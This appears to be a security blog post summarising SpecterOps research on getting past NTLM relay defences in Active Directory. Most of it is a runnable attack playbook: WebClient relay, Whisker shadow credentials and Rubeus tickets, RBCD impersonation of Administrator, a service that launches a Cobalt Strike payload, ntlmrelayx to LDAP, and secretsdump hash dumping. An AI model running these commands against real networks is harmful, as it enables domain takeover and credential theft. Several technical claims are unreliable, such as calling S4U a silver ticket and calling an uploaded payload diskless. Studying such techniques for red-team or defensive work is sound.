Listen to this Post
Introduction
Traditional NTLM relay attacks are hitting roadblocks as modern defenses harden SMB (port 445) and restrict WMI (port 135). With EDR flagging SAM/SYSTEM registry extraction and SMB signing enforced, attackers must adapt. SpecterOps reveals advanced techniques like Service Control Manager manipulation, Webclient abuse, and shadow credentials to bypass these limitations.
Learning Objectives
- Understand why classic NTLM relay attacks fail in modern environments
- Learn how to abuse Service Control Manager (SCM) for lateral movement
- Master stealthy shadow credential and RBCD attacks against domain controllers
1. Bypassing SMB Signing with Webclient Abuse
Command:
sc.exe config WebClient start= auto sc.exe start WebClient
What it does:
Enables the WebClient service, allowing HTTP-based NTLM relay instead of SMB (port 445).
Step-by-Step:
1. Check if WebClient is disabled:
sc.exe query WebClient
2. Enable and start it:
sc.exe config WebClient start= auto sc.exe start WebClient
3. Relay via PetitPotam or PrinterBug to HTTP endpoints.
2. Shadow Credentials for Persistence
Command:
Whisker.exe add /target:DC01 /domain:corp.local /dc:DC01.corp.local /path:C:\temp\cert.pfx /password:P@ssw0rd
What it does:
Adds a Key Credential to a target computer, enabling Rubeus-based Kerberos attacks.
Step-by-Step:
1. Use Whisker to generate a certificate:
Whisker.exe add /target:DC01 /domain:corp.local /dc:DC01.corp.local
2. Extract the TGT with Rubeus:
Rubeus.exe asktgt /user:DC01$ /certificate:C:\temp\cert.pfx /password:P@ssw0rd /ptt
3. RBCD (Resource-Based Constrained Delegation) Attack
Command:
Set-DomainRBCD -Identity DC01 -DelegateFrom COMPROMISED$ -Verbose
What it does:
Configures RBCD to impersonate any service on the DC.
Step-by-Step:
1. Compromise a machine account (`COMPROMISED$`).
2. Assign RBCD rights:
Set-DomainRBCD -Identity DC01 -DelegateFrom COMPROMISED$
3. Use Rubeus for a silver ticket:
Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC01.corp.local /altservice:LDAP /dc:DC01.corp.local /ptt
- Evading EDR with Service Control Manager (SCM) Manipulation
Command:
sc.exe create "FakeService" binPath= "C:\malicious\payload.exe" start= auto
What it does:
Creates a malicious service for execution without touching disk (EDR evasion).
Step-by-Step:
1. Upload a payload (e.g., Cobalt Strike beacon).
2. Create a service:
sc.exe create "FakeService" binPath= "C:\malicious\payload.exe" start= auto
3. Start it:
sc.exe start FakeService
- NTLM Relay to LDAP for Domain Compromise
Command:
ntlmrelayx.py -t ldap://DC01.corp.local --escalate-user
What it does:
Relays NTLM to LDAP, granting DCSync rights.
Step-by-Step:
1. Trigger an NTLM auth (e.g., PrinterBug).
2. Relay to LDAP:
ntlmrelayx.py -t ldap://DC01.corp.local --escalate-user
3. Dump hashes with secretsdump:
secretsdump.py corp.local/Administrator@DC01 -just-dc
What Undercode Say:
- Key Takeaway 1: Modern EDR detects traditional NTLM relay—shift to WebClient, SCM, and RBCD.
- Key Takeaway 2: Shadow credentials + RBCD = persistence without touching LSASS.
Analysis:
Defenders are winning against old-school NTLM relay, but attackers adapt with Kerberos-based attacks. Expect more HTTP-based relaying as SMB hardening increases.
Prediction:
By 2026, NTLM will be deprecated in favor of Kerberos, but attackers will pivot to WS-Management, RPC over HTTP, and cloud-based relay vectors.
Further Reading:
IT/Security Reporter URL:
Reported By: Specterops Escaping – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
